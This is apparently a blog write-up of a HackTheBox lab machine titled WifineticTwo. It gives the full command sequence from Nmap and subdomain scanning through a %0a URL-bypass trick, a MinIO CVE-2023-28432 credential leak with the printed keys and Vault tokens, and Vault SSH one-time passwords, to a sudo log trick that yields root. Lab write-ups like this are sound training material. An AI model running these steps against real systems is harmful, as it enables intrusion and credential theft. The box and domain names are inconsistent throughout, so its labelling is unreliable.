WifineticTwo HTB Writeup | HacktheBox

Introduction

In this post, I’ll show you how to solve the challenge WifineticTwo from HTB. If you have any questions, feel free to comment below.

Hacking Phases in WifineticTwo

  1. Add IP address to the /etc/hosts file.
  2. Scan with Nmap.
  3. Check out the website to gather information.
  4. Gather credentials.
  5. Find out the users.
  6. Escalate privileges.

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on X.

Let’s Hack Perfection HTB 😌

https://twitter.com/HacklikeHacker

Add IP to /etc/hosts

Please add the domain WifineticTwo.htb to your /etc/hosts file.

sudo nano /etc/hosts

Nmap Scan

Let’s run a Nmap scan.

nmap -A 10.10.11.254 -Pn

Let’s find subdomains by using Gobuster for enumeration.

gobuster dns -d WifineticTwol.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 20

We found a subdomain called demo.WifineticTwo.htb, which seems to be included in the host file.

Site Enumeration

We can use the basic/default login details to sign in.

guest:guest

Credential Harvest

On the left side, there’s an option called Min10 Metrics. When we try to open Min10 Metrics, it gives us a 403 forbidden error. To get around this, I added %0a at the end of the URL.

<http://demo.WifineticTwol.htb/metrics%0a>

At the endpoint, there’s a web address visible.

<http://prd23-s3-backend.WifineticTwol.htb/minio/v2/metrics/cluster>

Please add “prd23-s3-backend.WifineticTwol**.htb” to the /etc/hosts file. We found a vulnerability, CVE-2023–28432, and there’s a GitHub Proof of Concept (PoC) available.

We need to check this “Information Leak Vulnerability” concerning Minio. With this vulnerability, we can uncover some Minio-related credentials. Use BurpSuite to intercept and get the credentials.

"MINIO_ROOT_USER": "5GrE1B2YGGyZzNHZaIww"
"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0"

Now, let’s install the Min10 client and then run it.

./mc alias set myminio <http://prd23-s3-backend.WifineticTwol.htb/> 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

Let’s check for files.

./mc ls -r --versions myminio

Here, we’ve found some backup files with the .gz extension. I tried to download these files and extract them.

./mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz .
ls -la
tar -xzvf home_backup.tar.gz

User Enumeration

After looking through more files with the .gz extension, we discovered these ones.

export VAULT_API_ADDR="<http://prd23-vault
internal.WifineticTwol.htb/>"
export 
VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"

To set up Vault, include “prd23-vault-internal.WifineticTwol**.htb” in the /etc/hosts file. After that, execute the following command.

export VAULT_ADDR="<http://prd23-vault-internal.WifineticTwol.htb/>" export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
./vault login

First, import the configuration file into Vault, and then check if the token value is valid.

To get user access, run the provided code. It will generate a one-time password (OTP), which you should use as the password for the SSH connection.

./vault ssh -role dev_otp_key_role -mode otp askyy@10.10.11.254

Privilege Escalation

sudo -l

I ran the command root/vault/vault-unseal -c /etc/vault-unseal.yaml.

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v

We noticed that a master token is generated. We have to copy it to a log file. So, let’s create a .log file in the current directory.

touch debug.log
chown askyy:askyy debug.log

ls -la

Allow the user’s claim to access debug.log. Now, askyy can write to the debug.log file. Please run the given command.

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v /home/askyy/debug.log

The master token has been saved in the debug.log file. Please open and read the debug.log file.

cat debug.log

Now, we’ve connected to Vault successfully. We can try logging in as the user “askyy” using the same method as before.

export VAULT_ADDR="<http://prd23-vault-internal.WifineticTwol.htb/>"
export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"

To obtain root access, run the provided code. It will generate a one-time password (OTP), which you should use as the password for the SSH connection.

./vault ssh -role admin_otp_key_role -mode otp root@10.10.11.254

Conclusion

To sum up, solving the WifineticTwol box involved tackling different challenges and weaknesses, such as finding subdomains, exploiting CVEs, and using tools like Vault to manage access.

By thoroughly exploring, exploiting, and adjusting configurations, we gained different levels of access. This highlights the significance of detailed investigation and exploitation methods in penetration testing situations.

Also Read: HTB Write-ups

Share your love
moulik
moulik
Articles: 357

You may also like

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site